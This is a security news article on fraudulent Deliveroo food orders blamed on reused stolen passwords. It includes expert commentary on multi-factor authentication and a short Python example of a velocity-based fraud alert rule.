Deliveroo is adamant that it has not suffered a breach, and that no card details or other personal information has been stolen. "We are aware of these cases raised by Watchdog - they involve stolen food, not credit card numbers," it said in a statement. "These issues occur when criminals use a password stolen from another service unrelated to our company in a major data breach." Deliveroo is reimbursing the customers.

If Deliveroo is correct in this statement, it raises several other issues. Firstly, and obviously, users need to start practicing better password hygiene. Secondly, Deliveroo needs to improve its security in terms of fraud detection and customer authentication. Thirdly, it is not immediately apparent how the fraudster benefits from this fraud.

The reaction from most security vendors is simple. Single factor password authentication is no longer adequate. Users should have unique strong passwords for every service they use, while vendors should implement and insist on multi-factor authentication. It seems clear that multi-factor authentication (MFA) hasn't been implemented because Deliveroo has sought a frictionless experience for its users. Furthering this frictionless approach, Deliveroo maintains the customers' card details to allow easily repeatable orders -- but does not require the 3-digit security number when taking new orders.

This fits in with the idea that the fraudster(s) used credentials obtained from other hacks and released on the internet -- that is all they would need. Kaspersky Lab's David Emm comments, "Businesses must ensure they implement two-factor authentication, so that credentials stolen from another site would not be sufficient for an attacker to get access to their customers' accounts."

F-Secure's Sean Sullivan agrees. "An app such as this probably really requires that the app vendor requests the account holder's phone number -- and then sends an SMS with a code in order to activate the app. If all it relies on is a password… then any old fraudster will be able to exploit the system for free food. If a second factor of some sort is used during setup, it limits the risk. But that's the thing… start-ups want to be 'frictionless' to setup. So, Deliveroo will just have to eat the costs, if it can."

But you can have frictionless MFA with modern smartphones using, for example, facial recognition.

It is difficult at this point to know whether Deliveroo has adequate fraud prevention systems simply because there is insufficient information yet. But it seems unlikely.

The BBC reports, "User Judith MacFadyen, from Reading, told Watchdog: 'I noticed that I had a 'thank you' email from Deliveroo for a burger joint in Chiswick. I thought that was really odd so I went on to my account and had a look and there had been four orders that afternoon to a couple of addresses in London.'" Four separate orders on one account to two addresses in one afternoon should really trip warning flags.
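The warning flags mentioned above amount to a simple velocity rule: several orders in a short window, to more than one address, at an address the account has never used. This is an added example of such a rule (not Deliveroo's system); the order records are constructed to resemble the Watchdog case, with made-up times and addresses.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed order records (hypothetical accounts "jm" and "ok").
ORDERS = [
    {"account": "jm", "time": "2016-11-20T13:05", "address": "Reading, RG1"},
    {"account": "jm", "time": "2016-11-23T14:10", "address": "Chiswick, W4"},
    {"account": "jm", "time": "2016-11-23T14:42", "address": "Chiswick, W4"},
    {"account": "jm", "time": "2016-11-23T15:30", "address": "Camden, NW1"},
    {"account": "jm", "time": "2016-11-23T16:05", "address": "Camden, NW1"},
    {"account": "ok", "time": "2016-11-23T18:00", "address": "Manchester, M1"},
    {"account": "ok", "time": "2016-11-23T19:45", "address": "Manchester, M1"},
]

def velocity_alerts(orders, window=timedelta(hours=6), max_orders=3, max_addresses=1):
    """Flag an order when, in the `window` ending at that order, the account has
    placed more than `max_orders` orders or shipped to more than `max_addresses`
    distinct addresses. If the flagged order goes to an address the account never
    used before the window, that is noted too: stolen-credential fraud ships to the
    fraudster's pickup point, not to the account holder's usual address."""
    by_account = defaultdict(list)
    for o in orders:
        by_account[o["account"]].append((datetime.fromisoformat(o["time"]), o["address"]))
    alerts = []
    for account, hist in by_account.items():
        hist.sort()
        for i, (t, addr) in enumerate(hist):
            recent = [(rt, ra) for rt, ra in hist[:i + 1] if t - rt < window]
            seen_before = {ra for rt, ra in hist if rt <= t - window}
            reasons = []
            if len(recent) > max_orders:
                reasons.append(f"{len(recent)} orders in {window}")
            distinct = {ra for _, ra in recent}
            if len(distinct) > max_addresses:
                reasons.append(f"{len(distinct)} delivery addresses in {window}")
            if reasons and addr not in seen_before:
                reasons.append("address never used before")
            if reasons:
                alerts.append({"account": account, "time": t.isoformat(), "reasons": reasons})
    return alerts
```

On the constructed data the rule fires twice for "jm" (from the third same-afternoon order onwards) and never for "ok", whose two orders go to one familiar address.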

The third puzzle is how the fraudster benefits from food delivered to different parts of the country. Three locations are mentioned by the BBC: London, Reading and Manchester. Manchester and London are 200 miles apart. It could still be simple food fraud. Sullivan explains, "All the fraudster needs to do is to have the food delivered to a public address such as a coworking space. Or even just the front of some building -- the app lets you track the delivery -- so the fraudster would know when to step forward to claim the order. The delivery person isn't going to be able to vet the person picking up the food is actually the legitimate account holder. They'll just hand over the food to the person who knows the order ID."

But multiple orders in one afternoon and such diverse delivery locations suggest it could equally be something different. ESET Senior Research Fellow David Harley commented, "I wouldn’t be surprised if it did turn out to be due to the action of a person or persons targeting the company by getting food delivered to what may be randomly-selected addresses. A disgruntled employee? A competitor using information provided by a mole? A hacker for hire, or just doing it because it amuses them and they can? I don’t know, but I'll be watching future developments with interest."
